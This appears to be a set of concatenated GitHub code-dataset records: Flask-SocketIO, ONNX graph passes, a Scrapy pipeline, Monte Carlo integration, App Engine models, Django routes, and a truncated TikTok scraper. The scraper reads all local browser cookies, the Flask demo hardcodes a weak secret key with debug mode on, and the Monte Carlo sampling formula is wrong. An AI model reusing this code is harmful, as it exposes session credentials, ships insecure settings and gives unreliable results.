Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!' # Feel free to change it to any more strong secrets as per requirement\nsocketio = SocketIO(app)\n\n@app.route('/')\ndef index():\n \"\"\"\n - For explanation purposes, I have done random number generation\n - Generates the updated random number after every 3 seconds\n - Random number range will be between 1 to 100 at this time, can be changed accordingly\n - More real-time scenarios can be possible, but this was a basic example to get started\n - Socket connections are used to maintain the state of the APIs\n \"\"\"\n return render_template('index.html')\n\ndef update_data():\n while True:\n time.sleep(3) # Update data every 3 seconds\n data = {'value': random.randint(1, 100)}\n socketio.emit('update', data, namespace='/test')\n\n@socketio.on('connect', namespace='/test')\ndef handle_connect():\n print('Client connected')\n\n@socketio.on('disconnect', namespace='/test')\ndef handle_disconnect():\n print('Client disconnected')\n\nif __name__ == '__main__':\n socketio.start_background_task(target=update_data)\n socketio.run(app, debug=True)\n","repo_name":"soubarno77/flask_projects","sub_path":"Flask_Assignment12/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37937974232","text":"from ...core import Graph\nfrom ...core import Node\nfrom ...core.match_utils import ConstantMatcher, OpMatcher, AnyAttrValue, make_pattern\nfrom ...passes import Pass\nfrom ...ops import Op\nimport math\n\n\nclass ExtractGemm(Pass):\n \"\"\"\n input weight\n | |\n \\ [Transpose(1, 0)]\n \\ /\n [MatMul]\n |\n output\n\n or\n\n input weight\n | |\n \\ [Transpose(1, 0)]\n \\ /\n [MatMul]\n | bias\n | /\n [Add]\n |\n output\n\n \"\"\"\n\n def __init__(self):\n from onnx.helper import make_attribute\n\n trans = Node.make_node(\n \"tr\", \"Transpose\", [\"0\"], [\"1\"], [make_attribute(\"perm\", [1, 0])]\n )\n matmul = Node.make_node(\"matmul\", \"MatMul\", [\"2\", \"1\"], [\"3\"])\n self.pattern = Graph.make_graph(\n \"fc module\", {}, [trans, matmul], [\"0\", \"2\"], [\"3\"]\n )\n self.pattern.update_topology()\n\n biased_trans = Node.make_node(\n \"tr\", \"Transpose\", [\"0\"], [\"1\"], [make_attribute(\"perm\", [1, 0])]\n )\n 
biased_matmul = Node.make_node(\"matmul\", \"MatMul\", [\"2\", \"1\"], [\"3\"])\n        bias = Node.make_node(\"add\", \"Add\", [\"3\", \"4\"], [\"5\"])\n        self.biased_pattern = Graph.make_graph(\n            \"fc module\", {}, [biased_trans, biased_matmul, bias], [\"0\", \"2\", \"4\"], [\"5\"]\n        )\n        self.biased_pattern.update_topology()\n\n        nodes = [\n            ConstantMatcher(\"weight\"),\n            Op.make_op(\"MatMul\", \"matmul\", [\"0\", \"weight\"], [\"2\"]),\n            ConstantMatcher(\"bias\"),\n            Op.make_op(\"Add\", \"add\", [\"2\", \"bias\"], [\"4\"]),\n        ]\n        self.biased_xxpattern = make_pattern(nodes, [\"0\"], [\"4\"])\n\n        nodes = [\n            ConstantMatcher(\"weight\"),\n            Op.make_op(\"MatMul\", \"matmul\", [\"0\", \"weight\"], [\"2\"]),\n        ]\n        self.xxpattern = make_pattern(nodes, [\"0\"], [\"2\"])\n\n    def run(self, graph):\n        from onnx.helper import make_attribute\n\n        def make_gemm(r):\n            inp = r[\"matmul\"].input[0]\n            if \"tr\" in r:\n                # has weight transpose, so w is the input of transpose,\n                # since it will be used as input of Gemm.\n                w = r[\"tr\"].input[0]\n                transpose_b = 1\n            else:\n                w = r[\"matmul\"].input[1]\n                transpose_b = 0\n            if \"add\" in r:\n                # has bias add\n                out = r[\"add\"].output[0]\n                b = r[\"add\"].input[1]\n            else:\n                out = r[\"matmul\"].output[0]\n                b = None\n            lsp = graph.get_tensor_shape(inp)\n            # rsp is the shape of second input into matmul\n            rsp = graph.get_tensor_shape(r[\"matmul\"].input[1])\n            res = []\n\n            # computation should be (.., k) * (k, n) -> (.., n)\n            if len(rsp) != 2 or lsp[-1] != rsp[0]:\n                return None\n\n            if len(lsp) != 2:\n                reshape_name = r[\"matmul\"].name + \"::reshape0\"\n                reshape_out = r[\"matmul\"].name + \"_reshape_out\"\n                reshape = Op.make_op(\n                    \"Reshape\",\n                    reshape_name,\n                    [inp],\n                    [reshape_out],\n                    {\"shape\": make_attribute(\"shape\", [-1, rsp[0]])},\n                )\n                inp = reshape_out\n                res.append(reshape)\n\n                gemm_out = out + \"_reshape_out\"\n\n                inputs = [inp, w, b] if b else [inp, w]\n                gemm = Op.make_op(\n                    \"Gemm\",\n                    r[\"matmul\"].name,\n                    inputs,\n                    [gemm_out],\n                    {\"transB\": transpose_b},\n                )\n                res.append(gemm)\n\n                reshape_name = r[\"matmul\"].name + \"::reshape1\"\n                out_sp = graph.get_tensor_shape(out)\n                reshape = Op.make_op(\n                    \"Reshape\",\n                    reshape_name,\n                    [gemm_out],\n                    [out],\n                    {\"shape\": make_attribute(\"shape\", [-1] + out_sp[1:])},\n                )\n                res.append(reshape)\n            else:\n                inputs = [inp, w, b] if b else [inp, w]\n                gemm = Op.make_op(\n                    \"Gemm\", r[\"matmul\"].name, inputs, [out], {\"transB\": transpose_b}\n                )\n                res.append(gemm)\n            return res\n\n        for r in graph.match(self.biased_pattern):\n            res = make_gemm(r)\n            if not res:\n                continue\n\n            graph.insert_nodes(res, graph.nodes.index(r[\"tr\"]))\n            [graph.del_node_purely(r[n]) for n in r]\n            graph.update_topology()\n            graph.update_tensor_shape()\n\n        for r in graph.match(self.pattern):\n            res = make_gemm(r)\n            if not res:\n                continue\n\n            graph.insert_nodes(res, graph.nodes.index(r[\"tr\"]))\n            [graph.del_node_purely(n) for n in r.values()]\n            graph.update_topology()\n            graph.update_tensor_shape()\n\n        for r in graph.match(self.biased_xxpattern):\n            res = make_gemm(r)\n            if not res:\n                continue\n\n            graph.insert_nodes(res, graph.nodes.index(r[\"matmul\"]))\n            [graph.del_node_purely(n) for n in r.values()]\n            graph.update_topology()\n            graph.update_tensor_shape()\n\n        for r in graph.match(self.xxpattern):\n            res = make_gemm(r)\n            if not res:\n                continue\n\n            graph.insert_nodes(res, graph.nodes.index(r[\"matmul\"]))\n            [graph.del_node_purely(n) for n in r.values()]\n            graph.update_topology()\n            graph.update_tensor_shape()\n\n        for n in list(graph.nodes):\n            if n.op_type == \"MatMul\":\n                lsp = 
graph.get_tensor_shape(n.input[0])\n                rsp = graph.get_tensor_shape(n.input[1])\n                if not (len(lsp) == 2 and len(rsp) == 2):\n                    continue\n                gemm = Op.make_op(\"Gemm\", n.name, n.input, n.output)\n                graph.insert_nodes([gemm], graph.nodes.index(n))\n                graph.del_node_purely(n)\n        graph.update_topology()\n        graph.update_tensor_shape()\n\n\nfrom ...core.match_utils import ConstantMatcher\n\n\nclass ExtractHswish(Pass):\n    \"\"\"This pass finds and converts the Hswish construct, which looks like\n     input     [Constant(3)]\n       |        /\n      / \\\      /\n     |  [Add]\n     |    |\n     |  [Clip(min=0, max=6)]\n      \\\   /\n      [Mul]    [Constant(6)]\n         \\\      /\n          [Div]\n            |\n          output\n    \"\"\"\n\n    def __init__(self):\n        import numpy as np\n        from onnx import numpy_helper\n        from onnx.helper import make_attribute\n\n        cons3 = ConstantMatcher(\"cons3\", value=np.array(3).astype(\"float32\"))\n        addn = Node.make_node(\"addn\", \"Add\", [\"0\", \"cons3\"], [\"2\"])\n        clipn = Node.make_node(\n            \"clipn\",\n            \"Clip\",\n            [\"2\"],\n            [\"3\"],\n            [make_attribute(\"min\", 0.0), make_attribute(\"max\", 6.0)],\n        )\n        muln = Node.make_node(\"muln\", \"Mul\", [\"0\", \"3\"], [\"4\"])\n        cons6 = ConstantMatcher(\"cons6\", value=np.array(6).astype(\"float32\"))\n        divn = Node.make_node(\"divn\", \"Div\", [\"4\", \"cons6\"], [\"6\"])\n\n        self.pattern = Graph.make_graph(\n            \"hswish module\", {}, [cons3, addn, clipn, muln, cons6, divn], [\"0\"], [\"6\"]\n        )\n        self.pattern.update_topology()\n\n    def run(self, graph):\n        for r in graph.match(self.pattern):\n            for n in r.values():\n                if n.op_type == \"Add\":\n                    op_name = n.name\n                    inp = n.input[0]\n                if n.op_type == \"Div\":\n                    out = n.output[0]\n            hswish = Op.from_onnx_node(\n                Node.make_node(op_name, \"Hswish\", [inp], [out]).dump_to_onnx()\n            )\n            graph.insert_nodes([hswish], graph.nodes.index(r[\"cons3\"]))\n            [graph.del_node_purely(n) for n in r.values()]\n        graph.update_topology()\n        graph.update_tensor_shape()\n\n\nclass ExtractHsigmoid(Pass):\n    \"\"\"This pass finds and converts the Hsigmoid construct, which looks like\n     input     [Constant(3)]\n       |        /\n        \\\      /\n        [Add]\n          |\n        [Clip(min=0, max=6)]\n          |    [Constant(6)]\n          \\\      /\n           [Div]\n             |\n           output\n    \"\"\"\n\n    def __init__(self):\n        import numpy as np\n        from onnx import numpy_helper\n        from onnx.helper import make_attribute\n\n        cons3 = ConstantMatcher(\"cons3\", value=np.array(3).astype(\"float32\"))\n        addn = Node.make_node(\"addn\", \"Add\", [\"0\", \"cons3\"], [\"2\"])\n        clipn = Node.make_node(\n            \"clipn\",\n            \"Clip\",\n            [\"2\"],\n            [\"3\"],\n            [make_attribute(\"min\", 0.0), make_attribute(\"max\", 6.0)],\n        )\n        cons6 = ConstantMatcher(\"cons6\", value=np.array(6).astype(\"float32\"))\n        divn = Node.make_node(\"divn\", \"Div\", [\"3\", \"cons6\"], [\"6\"])\n\n        self.pattern = Graph.make_graph(\n            \"hsigmoid module\", {}, [cons3, addn, clipn, cons6, divn], [\"0\"], [\"6\"]\n        )\n        self.pattern.update_topology()\n\n    def run(self, graph):\n        from onnx.helper import make_attribute\n\n        for r in graph.match(self.pattern):\n            for n in r.values():\n                if n.op_type == \"Add\":\n                    op_name = n.name\n                    inp = n.input[0]\n                if n.op_type == \"Div\":\n                    out = n.output[0]\n            hsigmoid = Op.from_onnx_node(\n                Node.make_node(\n                    op_name,\n                    \"Hsigmoid\",\n                    [inp],\n                    [out],\n                    [make_attribute(\"alpha\", 1 / 6.0), make_attribute(\"beta\", 0.5)],\n                ).dump_to_onnx()\n            )\n            graph.insert_nodes([hsigmoid], graph.nodes.index(r[\"cons3\"]))\n            [graph.del_node_purely(n) for n in r.values()]\n        graph.update_topology()\n        graph.update_tensor_shape()\n\n\nclass EliminateReshapeNode:\n    \"\"\"Eliminate specific *Reshape* nodes which alter an initializer/constant's shape. 
This helps successor nodes acquire weights directly.\"\"\"\n\n    def run(self, graph):\n        candidate_node = [\"Reshape\", \"Squeeze\", \"Unsqueeze\"]\n        for n in graph.nodes:\n            if n.op_type in candidate_node:\n                inp = n.input[0]\n                prod = graph.get_tensor_producer(inp)\n                if inp not in graph.initializer or (\n                    isinstance(prod[0], Node) and prod[0].op_type != \"Constant\"\n                ):\n                    # target tensor is input or activation\n                    continue\n\n                if len(graph.get_tensor_consumer(inp)) != 1:\n                    # if inp is referenced by multiple nodes, we cannot resize it directly.\n                    continue\n\n                if inp in graph.initializer:\n                    # initializer\n                    graph.initializer[inp].dims[:] = graph.get_tensor_shape(n.output[0])\n                elif isinstance(prod[0], Node) and prod[0].op_type == \"Constant\":\n                    # constant\n                    prod[0].attributes[\"value\"].t.dims[:] = graph.get_tensor_shape(\n                        n.output[0]\n                    )\n\n                for o in graph.get_tensor_consumer(n.output[0]):\n                    # replace input\n                    if isinstance(o, Node):\n                        o.replace_input_purely(n.output[0], inp)\n                graph.del_node_purely(n)\n        graph.update_topology()\n\n\nclass ExtractGeLU(Pass):\n    \"\"\"This pass finds and converts the tanh-approximation GeLU construct,\n    i.e. the subgraph computing\n        0.5 * x * (1 + tanh(sqrt(2 / pi) * (x + 0.044715 * x^3)))\n    out of the Pow/Mul/Add/Tanh nodes and matching constants below.\n    \"\"\"\n\n    def __init__(self):\n        import numpy as np\n        from onnx import numpy_helper\n        from onnx.helper import make_attribute\n\n        cons3 = ConstantMatcher(\"cons3\", value=np.array(3).astype(\"float32\"))\n        pown = Node.make_node(\"pown\", \"Pow\", [\"0\", \"cons3\"], [\"2\"])\n        cons_0_044715 = ConstantMatcher(\n            \"cons_0_044715\", value=np.array(0.044715).astype(\"float32\")\n        )\n        mul0 = Node.make_node(\"mul0\", \"Mul\", [\"2\", \"cons_0_044715\"], [\"4\"])\n        add0 = Node.make_node(\"add0\", \"Add\", [\"0\", \"4\"], [\"5\"])\n        cons_rec_pi = ConstantMatcher(\n            \"cons_rec_pi\", value=np.array(math.sqrt(2.0 / math.pi)).astype(\"float32\")\n        )\n        mul1 = Node.make_node(\"mul1\", \"Mul\", [\"5\", \"cons_rec_pi\"], [\"7\"])\n        tanh = Node.make_node(\"tanh\", \"Tanh\", [\"7\"], [\"8\"])\n        cons1 = ConstantMatcher(\"cons1\", value=np.array(1).astype(\"float32\"))\n        add1 = Node.make_node(\"add1\", \"Add\", [\"8\", \"cons1\"], [\"10\"])\n        cons_0_5 = ConstantMatcher(\"cons_0_5\", value=np.array(0.5).astype(\"float32\"))\n        mul2 = Node.make_node(\"mul2\", \"Mul\", [\"0\", \"cons_0_5\"], [\"12\"])\n        mul3 = Node.make_node(\"mul3\", \"Mul\", [\"12\", \"10\"], [\"13\"])\n\n        self.pattern = Graph.make_graph(\n            \"gelu module\",\n            {},\n            [\n                cons3,\n                pown,\n                cons_0_044715,\n                mul0,\n                add0,\n                cons_rec_pi,\n                mul1,\n                tanh,\n                cons1,\n                add1,\n                cons_0_5,\n                mul2,\n                mul3,\n            ],\n            [\"0\"],\n            [\"13\"],\n        )\n        self.pattern.update_topology()\n\n    def run(self, graph):\n        for r in graph.match(self.pattern):\n            inp = r[\"pown\"].input[0]\n            out = r[\"mul3\"].output[0]\n            op_name = r[\"pown\"].name\n\n            gelu = Op.from_onnx_node(\n                Node.make_node(op_name, \"GeLU\", [inp], [out]).dump_to_onnx()\n            )\n            graph.insert_nodes([gelu], graph.nodes.index(r[\"pown\"]))\n            [graph.del_node_purely(n) for n in r.values()]\n        graph.update_topology()\n        graph.update_tensor_shape()\n\n\nclass ExtractLayerNorm(Pass):\n    \"\"\"This pass finds and converts the LayerNorm construct: mean/variance\n    normalization over the last axis followed by an elementwise scale (Mul)\n    and shift (Add).\n    \"\"\"\n\n    def __init__(self):\n        import numpy as np\n        from onnx import numpy_helper\n        from onnx.helper import make_attribute\n\n        reduce_0 = Node.make_node(\n            \"reduce_0\", \"ReduceMean\", [\"0\"], [\"1\"], [make_attribute(\"axes\", [-1])]\n        )\n        sub_0 = Node.make_node(\"sub_0\", \"Sub\", [\"0\", \"1\"], [\"2\"])\n        cons_2 = 
ConstantMatcher(\"cons_2\", value=np.array(2).astype(\"float32\"))\n pow_0 = Node.make_node(\"pow_0\", \"Pow\", [\"2\", \"cons_2\"], [\"4\"])\n reduce_1 = Node.make_node(\n \"reduce_1\", \"ReduceMean\", [\"4\"], [\"5\"], [make_attribute(\"axes\", [-1])]\n )\n cons_eps = ConstantMatcher(\"cons_eps\", pshape=[1], tolerant_shape=True)\n add_0 = Node.make_node(\"add_0\", \"Add\", [\"5\", \"cons_eps\"], [\"7\"])\n sqrt_0 = Node.make_node(\"sqrt_0\", \"Sqrt\", [\"7\"], [\"8\"])\n div_0 = Node.make_node(\"div_0\", \"Div\", [\"2\", \"8\"], [\"9\"])\n cons_w = ConstantMatcher(\"cons_w\")\n mul_0 = Node.make_node(\"mul_0\", \"Mul\", [\"9\", \"cons_w\"], [\"11\"])\n cons_b = ConstantMatcher(\"cons_b\")\n add_1 = Node.make_node(\"add_1\", \"Add\", [\"11\", \"cons_b\"], [\"13\"])\n\n self.pattern = Graph.make_graph(\n \"layernorm module\",\n {},\n [\n reduce_0,\n sub_0,\n cons_2,\n pow_0,\n reduce_1,\n cons_eps,\n add_0,\n sqrt_0,\n div_0,\n cons_w,\n mul_0,\n cons_b,\n add_1,\n ],\n [\"0\"],\n [\"13\"],\n )\n self.pattern.update_topology()\n\n def run(self, graph):\n for r in graph.match(self.pattern):\n inp = r[\"reduce_0\"].input[0]\n out = r[\"add_1\"].output[0]\n op_name = r[\"reduce_0\"].name\n w = r[\"mul_0\"].input[1]\n b = r[\"add_1\"].input[1]\n\n layernorm = Op.from_onnx_node(\n Node.make_node(op_name, \"LayerNorm\", [inp, w, b], [out]).dump_to_onnx()\n )\n graph.insert_nodes([layernorm], graph.nodes.index(r[\"reduce_0\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n","repo_name":"ModelTC/NART","sub_path":"python/nart/utils/passes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16585,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"16028343964","text":"#백트래킹 4번, 실버3\n\nn ,m = map(int, input().split())\n\nanswer = []\n\ndef dfs(depth):\n if len(answer) == m:\n print(\" \".join(map(str, answer)))\n return\n for i in range(depth, n+1):\n answer.append(i)\n dfs(i)\n answer.pop()\n\ndfs(1)","repo_name":"lookinmin/algorithm_study","sub_path":"week6/bakjoon_15652.py","file_name":"bakjoon_15652.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25193087798","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport json\n\n\nclass Dimensions(object):\n def process_item(self, item, spider):\n\n json_dimensions = {}\n\n if item.get(\"dimensions\"):\n try:\n leng = float((''.join(item[\"dimensions\"][0]).split(\" \"))[0])\n json_dimensions['length'] = leng\n except:\n return item\n\n try:\n wid = float((''.join(item[\"dimensions\"][0]).split(\" \"))[2])\n json_dimensions['width'] = wid\n except:\n return item\n\n try:\n hei = float((''.join(item[\"dimensions\"][0]).split(\" \"))[4])\n json_dimensions['height'] = hei\n except:\n return item\n\n try:\n wei = float((''.join(item[\"dimensions\"][1]).split(\" \", 1))[0])\n json_dimensions['weight'] = wei\n except:\n return item\n\n json_dimensions = json.dumps(json_dimensions)\n item[\"dimensions\"] = json_dimensions\n else:\n return item\n\n return 
item","repo_name":"metaroot/amazonScrape","sub_path":"scrapeAmazon/pipelines/dimensions.py","file_name":"dimensions.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16858994267","text":"\"\"\"\"\"\"\r\n\r\nimport random\r\nfrom math import sqrt\r\n\r\ndef estimate_area(func, xlo, xhi, ylo, yhi, n=100):\r\n \"\"\"\r\n Estimates arbitrary 2D area defined by a function\r\n\r\n Parameters\r\n ----------\r\n func : function\r\n Function of x and y\r\n xlo : float\r\n Minimum x value of region\r\n xhi : float\r\n Maximum x value of region\r\n ylo : float\r\n Minimum y value of region\r\n yhi : float\r\n Maximum y value of region\r\n n : int, optional\r\n Number of iterations. The default is 100.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n\r\n Returns\r\n -------\r\n area : float\r\n estimated area in region\r\n\r\n \"\"\"\r\n \r\n if (n <= 0):\r\n raise ValueError(\"n must be greater than zero\")\r\n if (xlo >= xhi or ylo >= yhi):\r\n raise ValueError\r\n \r\n total_A = (xhi-xlo)*(yhi-ylo)\r\n pts = pts_in = 0\r\n for i in range(0, n):\r\n x = (xhi+xlo)*random.random() - xlo\r\n y = (yhi+ylo)*random.random() - ylo\r\n \r\n if (func(x,y) < 0.0):\r\n pts_in += 1\r\n \r\n pts += 1\r\n \r\n area = (float(pts_in)/float(pts)) * total_A\r\n return area\r\n\r\ndef mc_integral(func, a, b, n):\r\n \"\"\"\r\n Estimates the integral of a given function using monte carlo\r\n\r\n Parameters\r\n ----------\r\n func : function\r\n returns a y value given x\r\n a : float\r\n lower x bound\r\n b : float\r\n upper x bound\r\n n : int\r\n number of random points to use between bounds\r\n\r\n Raises\r\n ------\r\n ValueError\r\n\r\n Returns\r\n -------\r\n integral : float\r\n the estimated integral\r\n sigma : float\r\n the estimated standard deviation\r\n\r\n \"\"\"\r\n \r\n if (n <= 0):\r\n raise ValueError\r\n \r\n if (a >= b):\r\n raise ValueError\r\n \r\n ac2 = ac = 0.\r\n for i in range(0, n):\r\n x = (a+b)*random.random() - a\r\n ac += func(x)\r\n ac2 += func(x)**2\r\n \r\n ac /= n\r\n ac2 /= n\r\n \r\n integral = ac*(b-a)\r\n sigma = (b-a)*sqrt( (ac2 - ac**2)/n )\r\n \r\n return integral, sigma","repo_name":"drcnic/rpi-numpe-fall-2021","sub_path":"In-class exercises/17/monte_carlo.py","file_name":"monte_carlo.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38596884271","text":"from google.appengine.ext import ndb\n\n\n#There are 5 root keys\ndef league_key(commissioner_id):\n \"\"\"League keys are based off of the id of the person who commissions them\"\"\"\n return ndb.Key(League, commissioner_id)\n\n\ndef account_key(account_id):\n \"\"\"Constructs a Datastore key for a account entity with a user id.\"\"\"\n return ndb.Key(Account, str(account_id))\n\n\ndef team_key(team_number):\n \"\"\"Constructs a Datastore key for a team given its number\"\"\"\n return ndb.Key('Team', team_number)\n\n\ndef root_event_key(event_id):\n \"\"\"Constructs the Datastore key for an event given its event_id\"\"\"\n return ndb.Key(RootEvent, event_id)\n\n\ndef root_team_key(team_number):\n \"\"\"Constructs the Datastore key for a root team given its number\"\"\"\n return ndb.Key(RootTeam, team_number)\n\n\n#Every other key is based off of the root keys\ndef team_event_key(team_key_val, event_id):\n \"\"\"Constructs a Datastore key for a team_event entity with a team_key as parent and event_id as id\"\"\"\n return 
ndb.Key(TeamEvent, event_id, parent=team_key_val)\n\n\ndef choice_key(player_key, league_id):\n \"\"\"Constructs a Datastore key for a Choice entity with a player_key as parent and league_id as id\"\"\"\n return ndb.Key(Choice, str(league_id), parent=player_key)\n\n\ndef lineup_key(choice_key_val, week_number):\n \"\"\"Constructs a Datastore key for a week choice entity with a choice_key as parent and week_number as id\"\"\"\n return ndb.Key(Lineup, str(week_number), parent=choice_key_val)\n\n\ndef draft_pick_key(league_key_val, position):\n \"\"\"Constructs a Datastore key for a draft pick entity with a league_key as parent and a position as id\"\"\"\n return ndb.Key(DraftPick, str(position), parent=league_key_val)\n\n\nclass League(ndb.Model):\n \"\"\"Stores players in the league and the league specific settings\"\"\"\n players = ndb.IntegerProperty(repeated=True) # Deprecated?\n name = ndb.StringProperty()\n snake_draft = ndb.BooleanProperty()\n draft_current_position = ndb.IntegerProperty()\n draft_current_timeout = ndb.DateTimeProperty()\n auto_start_draft_time = ndb.DateProperty()\n time_per_draft_pick = ndb.FloatProperty() #Minutes\n league_access_type = ndb.StringProperty()\n league_player_size_limit = ndb.IntegerProperty()\n number_of_locked_teams = ndb.IntegerProperty()\n number_of_draft_rounds = ndb.IntegerProperty()\n roster_size = ndb.IntegerProperty()\n active_lineup_size = ndb.IntegerProperty()\n\n\n\nclass RootEvent(ndb.Model):\n \"\"\"Stores the data for an entire event, differs from TeamEvent by having a larger scope\"\"\"\n name = ndb.StringProperty()\n teams = ndb.IntegerProperty(repeated=True)\n week = ndb.IntegerProperty()\n\n\nclass RootTeam(ndb.Model):\n \"\"\"Stores information such as scheduling and team name\"\"\"\n name = ndb.StringProperty()\n events = ndb.StringProperty(repeated=True)\n address = ndb.StringProperty()\n latlon = ndb.StringProperty()\n total_points = ndb.IntegerProperty()\n\n\nclass Account(ndb.Model):\n \"\"\"Stores data for an individual account\"\"\"\n nickname = ndb.StringProperty()\n league = ndb.StringProperty()\n\n #In the form described in https://github.com/smarthimandrew/FantasyFRC/issues/12\n schedule = ndb.StringProperty(repeated=True)\n record = ndb.StringProperty(repeated=True) # Uses the record variables in globals\n\n\nclass TeamEvent(ndb.Model):\n \"\"\"Stores a team's data for a single event\"\"\"\n rank = ndb.IntegerProperty()\n# qualification_score = ndb.IntegerProperty()\n# assist_points = ndb.IntegerProperty()\n# autonomous_points = ndb.IntegerProperty()\n# truss_and_catch_points = ndb.IntegerProperty()\n# teleop_points = ndb.IntegerProperty()\n win = ndb.IntegerProperty()\n loss = ndb.IntegerProperty()\n tie = ndb.IntegerProperty()\n# disqualified = ndb.IntegerProperty()\n played = ndb.IntegerProperty()\n awards = ndb.IntegerProperty(repeated=True)\n award_names = ndb.StringProperty(repeated=True)\n elimination_progress = ndb.IntegerProperty()\n\n\nclass Choice(ndb.Model):\n \"\"\"Stores all of the draft data for a single account for a single league\"\"\"\n current_team_roster = ndb.IntegerProperty(repeated=True)\n\n\nclass Lineup(ndb.Model):\n \"\"\"Stores the lineup for a single week for a single account\"\"\"\n active_teams = ndb.IntegerProperty(repeated=True)\n\n\nclass DraftPick(ndb.Model):\n \"\"\"Stores all of the information about one draft pick for a single league\"\"\"\n player = ndb.StringProperty()\n team = ndb.IntegerProperty()\n display_number = 
ndb.IntegerProperty()\n","repo_name":"Andrew-Dickinson/FantasyFRC","sub_path":"datastore_classes.py","file_name":"datastore_classes.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27837363265","text":"\"\"\"movie_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom movie import views as movie_views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', movie_views.home, name='home'),\n path('register/', movie_views.register, name='register'),\n path('bookings/', movie_views.bookings, name='bookings'),\n path('book/<int:movie_id>/', movie_views.book, name='book'),\n path('view_details/<int:movie_id>', movie_views.view_details, name='view_details'),\n path('customer_booking/<int:customer_id>/', movie_views.customer_booking, name='customer_booking'),\n path('cancel/<int:ticket_id>', movie_views.cancel, name='cancel'),\n\n]\n","repo_name":"bubblebeam/Movie_ticket_booking_app","sub_path":"movie_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39973174351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 14 14:06:01 2022\n\n@author: freelon\n\"\"\"\n\nimport browser_cookie3\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\nimport random\nimport re\nimport requests\nimport time\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.chrome.service import Service as ChromeiumService #sic\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium.webdriver.firefox.service import Service as FirefoxService\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.core.utils import ChromeType\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nheaders = {'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive'}\ncookies = browser_cookie3.load()\nurl_regex = '(?<=\\.com/)(.+?)(?=\\?|$)'\n\ndef deduplicate_metadata(metadata_fn,video_df,dedup_field='video_id'):\n if os.path.exists(metadata_fn):\n metadata = 
pd.read_csv(metadata_fn,keep_default_na=False)\n combined_data = pd.concat([metadata,video_df])\n combined_data[dedup_field] = combined_data[dedup_field].astype(str)\n else:\n combined_data = video_df\n return combined_data.drop_duplicates(dedup_field)\n\ndef generate_data_row(video_obj):\n data_header = ['video_id',\n 'video_timestamp',\n 'video_duration',\n 'video_locationcreated',\n 'video_diggcount',\n 'video_sharecount',\n 'video_commentcount',\n 'video_playcount',\n 'video_description',\n 'video_is_ad',\n 'video_stickers',\n 'author_username',\n 'author_name',\n 'author_followercount',\n 'author_followingcount',\n 'author_heartcount',\n 'author_videocount',\n 'author_diggcount',\n 'author_verified']\n data_list = []\n data_list.append(video_obj['id'])\n try:\n ctime = video_obj['createTime']\n data_list.append(datetime.fromtimestamp(int(ctime)).isoformat())\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['video']['duration'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['locationCreated'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['stats']['diggCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['stats']['shareCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['stats']['commentCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['stats']['playCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['desc'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['isAd'])\n except Exception:\n data_list.append(False)\n try:\n video_stickers = []\n for sticker in video_obj['stickersOnItem']:\n for text in 